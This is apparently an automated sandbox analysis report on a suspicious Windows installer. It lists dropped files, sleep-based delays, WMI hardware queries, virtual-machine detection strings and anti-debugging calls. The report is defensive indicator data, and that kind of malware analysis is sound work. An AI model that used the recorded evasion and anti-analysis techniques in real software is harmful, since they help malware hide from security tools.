                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIC5F7.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 680b04.rbf (copy)Jump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIC833.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI5C43.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSICFB6.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIA521.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI7FF9.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSICFF7.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIB1F8.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIC5C7.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6A82.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSICF77.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 680af9.rbf (copy)Jump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIB41E.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIC94E.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6BEB.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI7F89.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmpDropped PE file which has not been started: C:\Program Files (x86)\VxCXHgOKWFitaVL Corporation\is-9GOQR.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIB605.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a3.exeJump to dropped file
                                  Source: C:\Windows\SysWOW64\expand.exeDropped PE file which has not been started: C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\4120bfd883d24a4daf0a8db223a7081f.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 680aff.rbf (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpAPI coverage: 10.0 %
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeAPI coverage: 6.2 %
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeAPI coverage: 6.4 %
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: 28_2_0007E37028_2_0007E370
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_0050E37031_2_0050E370
                                  Source: C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe TID: 5320Thread sleep time: -2019250s >= -30000sJump to behavior
                                  Source: C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe TID: 5320Thread sleep time: -386500s >= -30000sJump to behavior
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe TID: 5244Thread sleep count: 328 > 30
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe TID: 6376Thread sleep count: 46 > 30
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe TID: 7072Thread sleep count: 265 > 30
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe TID: 8704Thread sleep count: 44 > 30
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe TID: 8700Thread sleep count: 283 > 30
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe TID: 9224Thread sleep count: 50 > 30
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe TID: 13728Thread sleep count: 48 > 30
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe TID: 10388Thread sleep count: 57 > 30
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe TID: 14536Thread sleep count: 43 > 30
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe TID: 15352Thread sleep count: 39 > 30
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe TID: 12888Thread sleep count: 296 > 30
                                  Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                                  Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                                  Source: C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                  Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                  Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exeLast function: Thread delayed
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exeLast function: Thread delayed
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exeLast function: Thread delayed
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exeLast function: Thread delayed
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exeLast function: Thread delayed
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\SysWOW64\expand.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\expand.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeFile Volume queried: C:\Users\user\AppData\Roaming FullSizeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeFile Volume queried: C:\Users\user\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install FullSizeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeFile Volume queried: C:\Users\user\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62 FullSizeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeFile Volume queried: C:\Users\user\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62 FullSizeInformation
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeFile Volume queried: C:\AppData\Roaming\AdvancedWindowsManager\Windows Installer 5.0.3\install FullSizeInformation
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeFile Volume queried: C:\AppData\Roaming\AdvancedWindowsManager\Windows Installer 5.0.3\install\7EB1504 FullSizeInformation
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeFile Volume queried: C:\AppData\Roaming\AdvancedWindowsManager\Windows Installer 5.0.3\install\7EB1504 FullSizeInformation
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeFile Volume queried: C:\AppData\Roaming\AdvancedWindowsManager\Windows Installer 5.0.3\install\7EB1504 FullSizeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpCode function: 4_2_10003A90 FtpSetCurrentDirectoryW,FtpFindFirstFileW,InternetFindNextFileW,InternetFindNextFileW,InternetCloseHandle,4_2_10003A90
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_002B6160 FindFirstFileW,GetLastError,FindClose,20_2_002B6160
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_002D9090 FindFirstFileW,FindClose,CloseHandle,CloseHandle,CloseHandle,CreateEventW,CreateThread,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,20_2_002D9090
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_001CF3C0 FindClose,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,_wcsrchr,_wcsrchr,20_2_001CF3C0
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_002B5B90 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,GetFileAttributesW,FindNextFileW,20_2_002B5B90
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_002D9F30 FindFirstFileW,FindClose,20_2_002D9F30
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_002E2330 FindFirstFileW,FindClose,20_2_002E2330
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_002F4630 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,20_2_002F4630
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_002C2ED0 FindFirstFileW,FindClose,FindClose,20_2_002C2ED0
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_002B5800 _wcsrchr,FindFirstFileW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,_wcsrchr,20_2_002B5800
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_002B7910 FindFirstFileW,FindClose,20_2_002B7910
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_0029BD30 FindFirstFileW,FindNextFileW,FindClose,20_2_0029BD30
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_002E1F30 FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,20_2_002E1F30
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_002D5F70 FindFirstFileW,FindClose,20_2_002D5F70
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_6A5651D0 FindFirstFileW,FindClose,GetLastError,FindClose,20_2_6A5651D0
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_6A55B570 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,_wcsrchr,_wcsrchr,20_2_6A55B570
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_6A583F55 FindFirstFileExW,20_2_6A583F55
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: 28_2_0006D7C0 GetLastError,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindClose,28_2_0006D7C0
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: 28_2_000EF4F9 FindFirstFileExW,28_2_000EF4F9
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_004FD7C0 GetLastError,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindClose,31_2_004FD7C0
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_0057F4F9 FindFirstFileExW,31_2_0057F4F9
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_002E0F00 _wcschr,_wcsrchr,_wcsrchr,GetLogicalDriveStringsW,GetDriveTypeW,Wow64DisableWow64FsRedirection,Wow64RevertWow64FsRedirection,20_2_002E0F00
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_00346652 VirtualQuery,GetSystemInfo,20_2_00346652
                                  Source: wmiprvse.exe, 0000000E.00000002.4556173624.000000006BEE0000.00000002.00000001.01000000.00000017.sdmpBinary or memory string: VMware
                                  Source: Windows Updater.exe, 0000001F.00000002.2922284466.0000000000F46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
                                  Source: wmiprvse.exe, 0000000E.00000002.4545412473.0000000000D4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(#
                                  Source: ZmWSzgevgt.tmp, 00000001.00000002.4546318478.000000000094D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW84
                                  Source: MSI743D.tmp.21.drBinary or memory string: RegOpenKeyTransactedW::NetUserGetInfo() failed with error: \@invalid string_view positionVMware, Inc.VMware Virtual PlatformVMware7,1innotek GmbHVirtualBoxMicrosoft CorporationVirtual MachineVRTUALACRSYSA M IGetting system informationManufacturer [Model [BIOS [\\?\UNC\\\?\shim_clone%d.%d.%d.%dDllGetVersion[%!]%!ProgramFilesFolderCommonFilesFolderDesktopFolderAllUsersDesktopFolderAppDataFolderFavoritesFolderStartMenuFolderProgramMenuFolderStartupFolderFontsFolderLocalAppDataFolderCommonAppDataFolderProgramFiles64FolderProgramFilesProgramW6432SystemFolderSystem32FolderWindowsFolderWindowsVolumeTempFolderSETUPEXEDIRshfolder.dllSHGetFolderPathWProgramFilesAPPDATAPROGRAMFILES&+
                                  Source: Windows Updater.exe, 0000001F.00000002.2922284466.0000000000F5D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                  Source: wmiprvse.exe, 0000000E.00000002.4545412473.0000000000DEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW Win32_SystemEnclosure
                                  Source: wmiprvse.exe, 0000000E.00000002.4556173624.000000006BEE0000.00000002.00000001.01000000.00000017.sdmpBinary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
                                  Source: wmiprvse.exe, 0000000E.00000002.4556884096.000000006BF4E000.00000002.00000001.01000000.00000016.sdmpBinary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
                                  Source: ZmWSzgevgt.tmp, 00000001.00000002.4546318478.0000000000992000.00000004.00000020.00020000.00000000.sdmp, ZmWSzgevgt.tmp, 00000001.00000003.2102655489.000000000098D000.00000004.00000020.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4546268057.0000000000857000.00000004.00000020.00020000.00000000.sdmp, wmiprvse.exe, 0000000E.00000002.4545412473.0000000000DEF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000002.2489922583.0000000004348000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2487272029.000000000433D000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2487171415.0000000004382000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2486195028.000000000437E000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2487407898.0000000004345000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2486296191.000000000433D000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000002.2489984022.0000000004397000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                  Source: wmiprvse.exe, 0000000E.00000002.4556173624.000000006BEE0000.00000002.00000001.01000000.00000017.sdmpBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
                                  Source: Windows Updater.exe, 0000001F.00000002.2922284466.0000000000F5D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                  Source: wmiprvse.exe, 0000000E.00000002.4556884096.000000006BF4E000.00000002.00000001.01000000.00000016.sdmpBinary or memory string: VMWare
                                  Source: setup.tmp, 00000004.00000002.4546268057.0000000000819000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
                                  Source: v113.exe, 00000020.00000003.2560788358.0000000002830000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 01234567890.0.0.0.%dVMware, Inc.VMware Virtual PlatformVMware7,1innotek GmbHVirtualBoxMicrosoft CorporationVirtual MachineVRTUALACRSYSA M IROOT\CIMV2SELECT * FROM Win32_ComputerSystemSELECT * FROM Win32_BIOSManufacturerModelVersionGetting system informationManufacturer [Model [BIOS [IsWow64Processkernel32Software\Microsoft\Windows NT\CurrentVersionSYSTEM\CurrentControlSet\Control\ProductOptionsCurrentMajorVersionNumberCurrentMinorVersionNumberCurrentVersionCurrentBuildNumberReleaseIdCSDVersionProductTypeProductSuiteWinNTServerNTSmall BusinessEnterpriseBackOfficeCommunicationServerTerminal ServerSmall Business(Restricted)EmbeddedNTDataCenterPersonalBladeEmbedded(Restricted)Security ApplianceStorage ServerCompute Server Failed to create IWbemLocator object. Error code: \\Could not connect to WMI provider. Error code: Failed to initialize security. Error code: Could not set proxy blanket. Error code: WQLWMI Query failed: []. Error code:
                                  Source: AdvancedWindowsManager.exe, 0000002B.00000002.2790436523.0000000000DC8000.00000004.00000020.00020000.00000000.sdmp, AdvancedWindowsManager.exe, 0000002D.00000002.2805651281.0000000000D99000.00000004.00000020.00020000.00000000.sdmp, AdvancedWindowsManager.exe, 0000002E.00000002.2804763775.0000000000DF9000.00000004.00000020.00020000.00000000.sdmp, AdvancedWindowsManager.exe, 0000002F.00000002.2702508192.00000000000A9000.00000004.00000020.00020000.00000000.sdmp, AdvancedWindowsManager.exe, 00000031.00000002.2712161571.0000000000E29000.00000004.00000020.00020000.00000000.sdmp, AdvancedWindowsManager.exe, 00000032.00000002.2711998440.0000000000E49000.00000004.00000020.00020000.00000000.sdmp, AdvancedWindowsManager.exe, 00000034.00000002.2713564233.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, AdvancedWindowsManager.exe, 00000036.00000002.2707866258.0000000000079000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                  Source: Windows Updater.exe, 0000001C.00000002.2534661329.000000000064D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWd
                                  Source: AdvancedWindowsManager.exe, 00000037.00000002.2802253604.0000000000DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<<
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpAPI call chain: ExitProcess graph end nodegraph_4-20625
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpProcess information queried: ProcessInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpCode function: 4_2_1001610F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_1001610F
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: 28_2_00088150 CreateFileW,GetLastError,OutputDebugStringW,OutputDebugStringW,SetFilePointer,FlushFileBuffers,WriteFile,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,OutputDebugStringW,WriteFile,WriteFile,FlushFileBuffers,FlushFileBuffers,28_2_00088150
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_002F42C0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,20_2_002F42C0
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_0035EA61 mov ecx, dword ptr fs:[00000030h]20_2_0035EA61
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_00348E85 mov esi, dword ptr fs:[00000030h]20_2_00348E85
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_0036389E mov eax, dword ptr fs:[00000030h]20_2_0036389E
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_003638E2 mov eax, dword ptr fs:[00000030h]20_2_003638E2
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_6A57A94C mov ecx, dword ptr fs:[00000030h]20_2_6A57A94C
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_6A583CC9 mov eax, dword ptr fs:[00000030h]20_2_6A583CC9
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: 28_2_000E55B1 mov ecx, dword ptr fs:[00000030h]28_2_000E55B1
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: 28_2_000D6A04 mov esi, dword ptr fs:[00000030h]28_2_000D6A04
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: 28_2_000EF2F8 mov eax, dword ptr fs:[00000030h]28_2_000EF2F8
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_00566A04 mov esi, dword ptr fs:[00000030h]31_2_00566A04
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_0057F2F8 mov eax, dword ptr fs:[00000030h]31_2_0057F2F8
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_005755B1 mov ecx, dword ptr fs:[00000030h]31_2_005755B1
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpCode function: 4_2_10027129 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,RtlAllocateHeap,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,4_2_10027129
                                  Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpCode function: 4_2_1001610F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_1001610F
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpCode function: 4_2_10019C57 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_10019C57
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpCode function: 4_2_1001F48D SetUnhandledExceptionFilter,__encode_pointer,4_2_1001F48D
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpCode function: 4_2_1001F4AF __decode_pointer,SetUnhandledExceptionFilter,4_2_1001F4AF
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpCode function: 4_2_10015D38 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_10015D38
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_001E6D50 __set_se_translator,SetUnhandledExceptionFilter,20_2_001E6D50
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_0034E5D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_0034E5D3
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_001E8AF0 __set_se_translator,SetUnhandledExceptionFilter,20_2_001E8AF0
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_0034996D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_0034996D
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_6A56D995 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_6A56D995
